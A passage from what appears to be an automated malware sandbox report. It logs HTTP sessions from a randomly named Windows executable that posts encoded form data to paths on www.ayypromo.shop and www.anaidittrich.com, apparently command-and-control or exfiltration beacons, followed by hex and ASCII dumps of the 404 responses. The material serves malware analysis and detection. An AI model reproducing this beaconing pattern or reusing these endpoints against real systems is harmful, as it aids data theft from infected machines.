                  Data Raw: 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 72 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 [TRUNCATED]
                  Data Ascii: <html> <head> <meta name="robots" content="noindex"> <title>404 Page Not Found.</title> </head> <body style="background-color:#eee;"> <table style="width:100%; height:100%;"> <tr> <td style="vertical-align: middle; text-align: center; font-family: sans-serif;"> <a href="http://tilda.cc"> <img src="http://tilda.ws/img/logo404.png" border="0" width="120" height="88" alt="Tilda" /> </a> <br> <br> <br> <br> <b>404 Page not found</b> </td> </tr> </table> </body></html>


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  31 | 192.168.2.4 | 49768 | 176.57.64.102 | 80 | 5440 | C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 4, 2024 09:37:50.855351925 CEST | 10850 | OUT | POST /rgqx/ HTTP/1.1
                  Host: www.ayypromo.shop
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.ayypromo.shop
                  Referer: http://www.ayypromo.shop/rgqx/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 10301
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Raw: 35 36 67 44 3d 70 35 38 49 47 6e 5a 52 30 58 64 46 78 46 72 4d 4b 79 63 39 69 4e 70 37 48 4f 46 63 31 47 65 69 78 64 58 6a 64 37 56 59 4e 58 53 69 70 34 42 45 41 72 45 51 4c 5a 4f 50 2f 4b 62 58 35 79 76 55 39 69 65 46 38 55 59 62 67 77 4f 4f 78 51 72 33 30 67 31 42 31 61 72 58 4a 4c 54 31 6d 47 62 4e 74 42 33 33 6a 36 6c 46 4a 73 71 49 2f 61 6d 67 56 73 4d 32 41 4c 63 68 57 42 75 4d 37 4a 30 36 68 47 55 32 46 58 4d 58 55 2b 43 39 62 78 4a 4e 53 41 37 76 55 36 6b 45 68 36 32 64 50 62 35 4c 32 6d 30 44 65 6b 45 4a 57 4a 56 73 2b 4d 70 71 6e 62 4e 77 32 50 63 76 58 72 35 2f 38 35 33 44 68 59 66 42 37 78 4e 6b 6a 39 6f 48 48 6a 45 6c 43 77 65 48 59 6f 2b 4d 45 2b 78 4d 68 6d 78 61 52 36 33 4d 4a 33 36 6b 55 71 68 74 38 30 67 52 76 73 78 41 45 49 43 67 48 45 6d 43 4a 74 37 64 30 37 36 62 70 56 55 78 75 6c 42 58 54 66 72 74 34 48 2b 48 43 79 70 55 54 43 71 42 69 58 38 50 68 55 67 68 4b 39 4f 31 4b 47 53 50 72 6b 46 68 6f 66 39 30 5a 5a 66 6d 39 4c 53 32 4a 78 59 68 61 66 74 55 38 67 43 4d 6a 49 72 33 39 [TRUNCATED]
                  Data Ascii: 56gD=... [TRUNCATED]
                  Sep 4, 2024 09:37:51.763303995 CEST | 1147 | IN | HTTP/1.1 404 Not Found
                  Server: ddos-guard
                  Connection: close
                  Set-Cookie: __ddg1_=sA3SAZhW47XbVhvsCNin; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Thu, 04-Sep-2025 07:37:51 GMT
                  Date: Wed, 04 Sep 2024 07:37:51 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 738
                  Last-Modified: Tue, 27 Aug 2024 08:59:13 GMT
                  ETag: "2e2-620a674a57ae6"
                  Accept-Ranges: bytes
                  X-Frame-Options: SAMEORIGIN
                  Data Raw: 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 72 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 [TRUNCATED]
                  Data Ascii: <html> <head> <meta name="robots" content="noindex"> <title>404 Page Not Found.</title> </head> <body style="background-color:#eee;"> <table style="width:100%; height:100%;"> <tr> <td style="vertical-align: middle; text-align: center; font-family: sans-serif;"> <a href="http://tilda.cc"> <img src="http://tilda.ws/img/logo404.png" border="0" width="120" height="88" alt="Tilda" /> </a> <br> <br> <br> <br> <b>404 Page not found</b> </td> </tr> </table> </body></html>


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  32 | 192.168.2.4 | 49769 | 176.57.64.102 | 80 | 5440 | C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 4, 2024 09:37:53.400991917 CEST | 482 | OUT | GET /rgqx/?56gD=k7UoFTYShwNh8X30FXwm38h6K+JkxlagtcywMstwCAmbg7ptW+NBcIDWqO/wkzukyRO00HsnixKpsDOlj0tXoOzwTrau4xfQqB+I7fBgXd6C+YuuVtNtf8U=&gTSpc=Khb8pT HTTP/1.1
                  Host: www.ayypromo.shop
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Connection: close
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Sep 4, 2024 09:37:54.042309046 CEST | 727 | IN | HTTP/1.1 404 Not Found
                  Server: ddos-guard
                  Connection: close
                  Set-Cookie: __ddg1_=wDtulPPKY6TqmR0BqDVC; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Thu, 04-Sep-2025 07:37:53 GMT
                  Date: Wed, 04 Sep 2024 07:37:53 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 340
                  Last-Modified: Tue, 29 May 2018 17:41:27 GMT
                  ETag: "154-56d5bbe607fc0"
                  X-Frame-Options: SAMEORIGIN
                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                  Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  33 | 192.168.2.4 | 49770 | 162.55.254.209 | 80 | 5440 | C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 4, 2024 09:37:59.105942965 CEST | 757 | OUT | POST /qpwk/ HTTP/1.1
                  Host: www.anaidittrich.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.anaidittrich.com
                  Referer: http://www.anaidittrich.com/qpwk/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 201
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Raw: 35 36 67 44 3d 43 6c 55 75 47 44 75 77 54 30 33 36 77 6b 2b 47 45 76 45 42 4b 37 67 57 6a 4c 53 34 44 2b 2b 42 54 66 6c 34 52 47 2b 37 6f 58 42 6f 65 66 42 2b 50 77 62 6e 69 39 5a 55 63 4b 48 5a 48 46 76 2f 38 6b 42 67 6f 36 61 4c 7a 77 35 46 4e 73 32 6e 38 78 54 49 73 2b 6c 33 4a 6f 38 2f 4b 71 31 55 49 64 67 5a 2b 44 56 42 36 76 66 71 4d 77 70 6b 62 75 42 33 30 73 57 4e 4a 31 4f 74 71 45 47 30 76 74 39 45 46 47 32 43 72 5a 41 30 53 70 5a 53 64 69 51 30 2f 72 6b 4c 33 57 66 4b 38 5a 64 72 72 6d 44 4c 55 39 43 59 70 39 77 52 61 70 58 32 69 68 39 57 43 6c 4f 69 52 72 61 34 58 73 61 4c 6a 77 3d 3d
                  Data Ascii: 56gD=ClUuGDuwT036wk+GEvEBK7gWjLS4D++BTfl4RG+7oXBoefB+Pwbni9ZUcKHZHFv/8kBgo6aLzw5FNs2n8xTIs+l3Jo8/Kq1UIdgZ+DVB6vfqMwpkbuB30sWNJ1OtqEG0vt9EFG2CrZA0SpZSdiQ0/rkL3WfK8ZdrrmDLU9CYp9wRapX2ih9WClOiRra4XsaLjw==
                  Sep 4, 2024 09:37:59.808926105 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                  Date: Wed, 04 Sep 2024 07:37:59 GMT
                  Server: Apache
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://anaidittrich.com/wp-json/>; rel="https://api.w.org/"
                  Upgrade: h2c
                  Connection: Upgrade, close
                  Transfer-Encoding: chunked
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 31 31 33 35 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 33 2e 31 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 [TRUNCATED]
                  Data Ascii: 11353<!DOCTYPE html><html lang="de-DE"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v23.1 - https://yoast.com/wordpress/plugins/seo/ --><meta property="og:locale" content="de_DE" /><meta property="og:title" content="Seite wurde nicht gefunden. - Anai Dittrich Art, Design, Care" /><meta property="og:site_name" content="Anai Dittrich Art, Design, Care" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"http://anaidittrich.com/#website","url":"http://anaidittrich.com/","name":"Anai Dittrich Art, Design, Care","description":"Mindful design and art projects","potentialAction":[{"@type":"SearchAction","target":{"@
                  Sep 4, 2024 09:37:59.808948040 CEST | 1236 | IN | Data Raw: 74 79 70 65 22 3a 22 45 6e 74 72 79 50 6f 69 6e 74 22 2c 22 75 72 6c 54 65 6d 70 6c 61 74 65 22 3a 22 68 74 74 70 3a 2f 2f 61 6e 61 69 64 69 74 74 72 69 63 68 2e 63 6f 6d 2f 3f 73 3d 7b 73 65 61 72 63 68 5f 74 65 72 6d 5f 73 74 72 69 6e 67 7d 22
                  Data Ascii: type":"EntryPoint","urlTemplate":"http://anaidittrich.com/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"de-DE"}]}</script>... / Yoast SEO plugin. --><title>Seite wurde nicht gefunden. - Anai D
                  Sep 4, 2024 09:37:59.808959961 CEST | 1236 | IN | Data Raw: 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2e 64 61 74 61 29 2c 72 3d 28 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c
                  Data Ascii: 32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(function(e,t){return
                  Sep 4, 2024 09:37:59.808970928 CEST | 672 | IN | Data Raw: 69 6e 67 3a 21 30 2c 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3a 21 30 7d 2c 65 3d 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43
                  Data Ascii: ing:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.t
                  Sep 4, 2024 09:37:59.808983088 CEST | 1236 | IN | Data Raw: 72 6b 65 72 28 55 52 4c 2e 63 72 65 61 74 65 4f 62 6a 65 63 74 55 52 4c 28 72 29 2c 7b 6e 61 6d 65 3a 22 77 70 54 65 73 74 45 6d 6f 6a 69 53 75 70 70 6f 72 74 73 22 7d 29 3b 72 65 74 75 72 6e 20 76 6f 69 64 28 61 2e 6f 6e 6d 65 73 73 61 67 65 3d
                  Data Ascii: rker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.e
                  Sep 4, 2024 09:37:59.808994055 CEST | 1236 | IN | Data Raw: 39 39 39 39 70 78 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 62 6c 6f 63 6b 2d 73 69 74 65 2d 74 69 74 6c 65 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 3a 72 6f 6f 74 20 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63
                  Data Ascii: 9999px}</style><style id='wp-block-site-title-inline-css'>:root :where(.wp-block-site-title a){color:inherit}</style><style id='wp-block-group-inline-css'>.wp-block-group{box-sizing:border-box}:where(.wp-block-group.wp-block-group-is-lay
                  Sep 4, 2024 09:37:59.809011936 CEST | 1236 | IN | Data Raw: 3d 77 72 69 74 69 6e 67 2d 6d 6f 64 65 5d 3a 77 68 65 72 65 28 5b 73 74 79 6c 65 2a 3d 76 65 72 74 69 63 61 6c 2d 6c 72 5d 29 2c 68 31 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 72 69 67 68 74 5b 73 74 79 6c 65 2a 3d 77 72 69 74 69 6e 67 2d
                  Data Ascii: =writing-mode]:where([style*=vertical-lr]),h1.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h2.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h2.has-text-align-right[style*=writing-mode]:where([sty
                  Sep 4, 2024 09:37:59.809022903 CEST | 1236 | IN | Data Raw: 2e 36 38 34 68 31 2e 37 33 37 5a 27 29 3b 0a 09 09 09 09 09 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 09 09 09 7d 0a 0a 09 09 09 09 2f 2a 20 48 69 64 65 20 74 68 65 20 61 73 74 65 72 69 73 6b 20 69 66 20 74 68 65 20 68 65 61 64 69 6e 67
                  Data Ascii: .684h1.737Z');display: block;}/* Hide the asterisk if the heading has no content, to avoid using empty headings to display the asterisk only, which is an A11Y issue */.is-style-asterisk:empty:before {content: none;
                  Sep 4, 2024 09:37:59.809037924 CEST | 328 | IN | Data Raw: 72 69 67 68 74 5b 73 74 79 6c 65 2a 3d 22 77 72 69 74 69 6e 67 2d 6d 6f 64 65 3a 76 65 72 74 69 63 61 6c 2d 72 6c 22 5d 7b 72 6f 74 61 74 65 3a 31 38 30 64 65 67 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 62 6c 6f
                  Data Ascii: right[style*="writing-mode:vertical-rl"]{rotate:180deg}</style><style id='wp-block-search-inline-css'>.wp-block-search__button{margin-left:10px;word-break:normal}.wp-block-search__button.has-icon{line-height:0}.wp-block-search__button svg{h
                  Sep 4, 2024 09:37:59.809051037 CEST | 1236 | IN | Data Raw: 6c 69 67 6e 3a 74 65 78 74 2d 62 6f 74 74 6f 6d 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 62 75 74 74 6f 6e 29 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 63 63 63 3b 70 61 64 64 69 6e 67 3a 36 70
                  Data Ascii: lign:text-bottom}:where(.wp-block-search__button){border:1px solid #ccc;padding:6px 10px}.wp-block-search__inside-wrapper{display:flex;flex:auto;flex-wrap:nowrap;max-width:100%}.wp-block-search__label{width:100%}.wp-block-search__input{appeara
                  Sep 4, 2024 09:37:59.813962936 CEST | 1236 | IN | Data Raw: 69 73 3a 30 3b 66 6c 65 78 2d 67 72 6f 77 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6d 69 6e 2d 77 69 64 74 68 3a 30 21 69 6d 70 6f 72 74 61 6e 74 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 21 69 6d 70 6f 72 74 61 6e 74 3b 70 61 64 64 69 6e 67 2d 72
                  Data Ascii: is:0;flex-grow:0;margin:0;min-width:0!important;padding-left:0!important;padding-right:0!important;width:0!important}:where(.wp-block-search__input){font-family:inherit;font-size:inherit;font-style:inherit;font-weight:inherit;letter-spacing:in


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  34 | 192.168.2.4 | 49771 | 162.55.254.209 | 80 | 5440 | C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 4, 2024 09:38:01.652968884 CEST | 777 | OUT | POST /qpwk/ HTTP/1.1
                  Host: www.anaidittrich.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.anaidittrich.com
                  Referer: http://www.anaidittrich.com/qpwk/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 221
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Raw: 35 36 67 44 3d 43 6c 55 75 47 44 75 77 54 30 33 36 78 45 75 47 4c 73 73 42 4d 62 67 5a 76 72 53 34 57 4f 2b 46 54 66 35 34 52 48 36 53 6f 6a 74 6f 65 39 4a 2b 4f 79 6a 6e 68 39 5a 55 57 71 48 63 4a 6c 76 77 38 6b 46 65 6f 37 6d 4c 7a 77 64 46 4e 70 4b 6e 38 47 48 4c 73 75 6c 78 42 49 38 39 48 4b 31 55 49 64 67 5a 2b 44 6f 6b 36 76 58 71 4d 41 31 6b 4b 2f 42 30 35 4d 57 4f 65 46 4f 74 68 6b 47 6f 76 74 39 71 46 48 71 34 72 62 49 30 53 73 6c 53 5a 6d 4d 37 31 72 6b 4e 34 32 65 69 33 70 55 2f 6c 45 47 45 63 38 65 6b 72 73 4e 78 62 76 47 73 7a 51 63 42 51 6c 71 52 4d 73 54 4d 61 76 6e 43 34 36 65 68 43 32 7a 2f 4e 33 34 4c 44 36 50 4b 54 5a 31 58 71 56 6b 3d
                  Data Ascii: 56gD=ClUuGDuwT036xEuGLssBMbgZvrS4WO+FTf54RH6Sojtoe9J+Oyjnh9ZUWqHcJlvw8kFeo7mLzwdFNpKn8GHLsulxBI89HK1UIdgZ+Dok6vXqMA1kK/B05MWOeFOthkGovt9qFHq4rbI0SslSZmM71rkN42ei3pU/lEGEc8ekrsNxbvGszQcBQlqRMsTMavnC46ehC2z/N34LD6PKTZ1XqVk=
                  Sep 4, 2024 09:38:02.416063070 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                  Date: Wed, 04 Sep 2024 07:38:02 GMT
                  Server: Apache
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://anaidittrich.com/wp-json/>; rel="https://api.w.org/"
                  Upgrade: h2c
                  Connection: Upgrade, close
                  Transfer-Encoding: chunked
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 31 31 33 35 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 33 2e 31 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 [TRUNCATED]
                  Data Ascii: 11353<!DOCTYPE html><html lang="de-DE"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v23.1 - https://yoast.com/wordpress/plugins/seo/ --><meta property="og:locale" content="de_DE" /><meta property="og:title" content="Seite wurde nicht gefunden. - Anai Dittrich Art, Design, Care" /><meta property="og:site_name" content="Anai Dittrich Art, Design, Care" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"http://anaidittrich.com/#website","url":"http://anaidittrich.com/","name":"Anai Dittrich Art, Design, Care","description":"Mindful design and art projects","potentialAction":[{"@type":"SearchAction","target":{"@
                  Sep 4, 2024 09:38:02.416076899 CEST | 1236 | IN | Data Raw: 74 79 70 65 22 3a 22 45 6e 74 72 79 50 6f 69 6e 74 22 2c 22 75 72 6c 54 65 6d 70 6c 61 74 65 22 3a 22 68 74 74 70 3a 2f 2f 61 6e 61 69 64 69 74 74 72 69 63 68 2e 63 6f 6d 2f 3f 73 3d 7b 73 65 61 72 63 68 5f 74 65 72 6d 5f 73 74 72 69 6e 67 7d 22
                  Data Ascii: type":"EntryPoint","urlTemplate":"http://anaidittrich.com/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"de-DE"}]}</script>... / Yoast SEO plugin. --><title>Seite wurde nicht gefunden. - Anai D
                  Sep 4, 2024 09:38:02.416088104 CEST | 1236 | IN | Data Raw: 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2e 64 61 74 61 29 2c 72 3d 28 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c
